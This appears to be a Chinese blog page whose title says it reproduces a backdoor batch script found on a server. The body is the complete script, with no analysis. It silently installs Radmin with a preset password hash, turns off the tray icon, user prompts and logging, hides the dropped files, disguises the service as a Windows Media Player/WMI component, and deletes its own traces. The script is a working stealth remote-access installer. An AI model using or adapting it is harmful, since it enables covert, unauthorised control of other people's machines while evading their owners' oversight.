[批处理][网络管理中发现服务器上远程控制程序以批处理注入的程序片]

@echo off
@system.exe /uninstall /silence
@system.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/iplist]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters]>> c:/server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:/server.reg
echo "Parameter"=hex:df,ac,59,ee,60,c7,c2,c8,5b,3d,74,dd,9d,f5,57,2b>> c:/server.reg
echo "Port"=hex:15,1e,00,00>> c:/server.reg
echo "Timeout"=hex:0a,00,00,00>> c:/server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:/server.reg
echo "LogFilePath"="c://logfile.txt">> c:/server.reg
echo "FilterIp"=hex:00,00,00,00>> c:/server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:/server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:/server.reg
echo "AskUser"=hex:00,00,00,00>> c:/server.reg
echo "EnableEventLog"=hex:00,00,00,00 >> c:/server.reg
@regedit /s c:/server.reg
@net start r_server
@attrib +r +h %systemroot%/system32/drivers/system.exe
@attrib +r +h %systemroot%/system32/drivers/admdll.dll
@attrib +r +h %systemroot%/system32/drivers/raddrv.dll
echo Windows Registry Editor Version 5.00 > c:/ip.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/r_server] >> c:/ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务。">> c:/ip.reg

@regedit /s c:/ip.reg
@del c:/ip.reg /f /q
@del c:/server.reg /f /q

@sc config r_server displayname= "Windows Management Instrumentation Player Drivers"
@del %systemroot%/system32/haha.exe /f /q
@del %systemroot%/system32/drivers/sc.exe /f /q
@del %systemroot%/system32/drivers/1.bat /f /q
@del %systemroot%/system32/drivers/2.bat /f /q

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值